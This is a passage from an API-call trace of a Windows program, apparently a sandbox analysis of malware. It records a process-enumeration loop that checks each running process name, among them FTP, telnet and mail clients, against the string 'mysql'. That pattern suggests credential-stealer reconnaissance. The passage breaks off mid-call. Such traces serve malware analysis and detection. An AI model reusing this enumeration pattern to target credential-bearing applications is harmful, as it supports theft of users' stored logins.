pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0091.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.765] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b9b8 [0091.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x355b9b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0091.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0091.765] StrStrIA (lpFirst="registered try.exe", lpSrch="mysql") returned 0x0 [0091.765] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0091.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.766] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c538 [0091.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x355c538, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0091.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0091.767] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="mysql") returned 0x0 [0091.767] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0091.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.768] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541a48 [0091.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3541a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0091.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0091.768] StrStrIA (lpFirst="invite.exe", lpSrch="mysql") returned 0x0 [0091.768] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0091.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.770] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541898 [0091.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3541898, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0091.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0091.770] StrStrIA (lpFirst="idol.exe", lpSrch="mysql") returned 0x0 [0091.770] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0091.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.771] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c628 [0091.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x355c628, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0091.771] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0091.771] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="mysql") returned 0x0 [0091.771] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0091.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.772] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355c560 [0091.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x355c560, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0091.773] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0091.773] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="mysql") returned 0x0 [0091.773] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0091.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.774] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3541ac0 [0091.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3541ac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0091.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0091.774] StrStrIA (lpFirst="powell_jane.exe", lpSrch="mysql") returned 0x0 [0091.774] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0091.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.775] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b7f8 [0091.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x355b7f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0091.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0091.775] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="mysql") returned 0x0 [0091.775] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0091.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.777] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3541af0 [0091.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3541af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0091.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0091.777] StrStrIA (lpFirst="gainedshape.exe", lpSrch="mysql") returned 0x0 [0091.777] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0091.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.778] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b818 [0091.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x355b818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0091.778] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0091.778] StrStrIA (lpFirst="opens-versions.exe", lpSrch="mysql") returned 0x0 [0091.778] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0091.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.779] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c588 [0091.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x355c588, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0091.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0091.780] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="mysql") returned 0x0 [0091.780] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0091.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.781] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541a90 [0091.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0091.781] StrStrIA (lpFirst="3dftp.exe", lpSrch="mysql") returned 0x0 [0091.781] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0091.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.782] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b838 [0091.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x355b838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0091.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0091.782] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="mysql") returned 0x0 [0091.782] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0091.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.784] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541ad8 [0091.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.784] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0091.784] StrStrIA (lpFirst="alftp.exe", lpSrch="mysql") returned 0x0 [0091.784] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0091.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.788] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35418b0 [0091.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35418b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0091.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0091.789] StrStrIA (lpFirst="barca.exe", lpSrch="mysql") returned 0x0 [0091.789] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0091.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.790] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541988 [0091.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3541988, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0091.790] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0091.790] StrStrIA (lpFirst="bitkinex.exe", lpSrch="mysql") returned 0x0 [0091.790] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0091.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.792] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541a18 [0091.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0091.792] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0091.792] StrStrIA (lpFirst="coreftp.exe", lpSrch="mysql") returned 0x0 [0091.792] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0091.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.794] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547818 [0091.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547818, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0091.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0091.794] StrStrIA (lpFirst="far.exe", lpSrch="mysql") returned 0x0 [0091.794] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0091.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.795] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35418e0 [0091.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35418e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0091.796] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0091.796] StrStrIA (lpFirst="filezilla.exe", lpSrch="mysql") returned 0x0 [0091.796] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0091.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.797] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541958 [0091.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3541958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0091.797] StrStrIA (lpFirst="flashfxp.exe", lpSrch="mysql") returned 0x0 [0091.797] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0091.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.799] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35418f8 [0091.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35418f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0091.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0091.799] StrStrIA (lpFirst="fling.exe", lpSrch="mysql") returned 0x0 [0091.799] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0091.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.801] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b858 [0091.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x355b858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0091.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0091.801] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="mysql") returned 0x0 [0091.801] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0091.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.803] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b878 [0091.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x355b878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0091.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0091.803] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="mysql") returned 0x0 [0091.803] Process32NextW 